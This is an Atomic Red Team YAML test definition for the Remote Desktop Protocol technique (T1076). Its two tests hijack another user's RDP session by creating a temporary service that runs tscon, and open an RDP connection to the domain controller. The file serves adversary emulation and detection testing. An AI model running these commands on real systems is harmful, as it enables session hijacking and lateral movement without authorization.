Files
atomic-red-team/atomics/T1076/T1076.yaml
T
Andras32 9be96cf54f T1076 rdp to domain controller (#572)
* Added MacOS and Linux isElevated check [toso: test MacOS]

* Update Invoke-AtomicTest.ps1

* Update Invoke-AtomicTest.ps1

* Update Invoke-AtomicTest.ps1

* T1076 RDP To Domain Controller
2019-09-24 08:36:03 -06:00

49 lines
1.4 KiB
YAML

---
attack_technique: T1076
display_name: Remote Desktop Protocol
atomic_tests:
- name: RDP
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
sc.exe delete sesshijack
- name: RDPto-DomainController
description: |
Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user
supported_platforms:
- windows
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
default: $ENV:logonserver.TrimStart("\")
username:
description: Username argument default %USERDOMAIN%\%username%
type: String
default: $Env:USERDOMAIN\$ENV:USERNAME
executor:
name: powershell
elevation_required: false
prereq_command: |
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
command: |
Connect-RDP -ComputerName #{logonserver} -User #{username}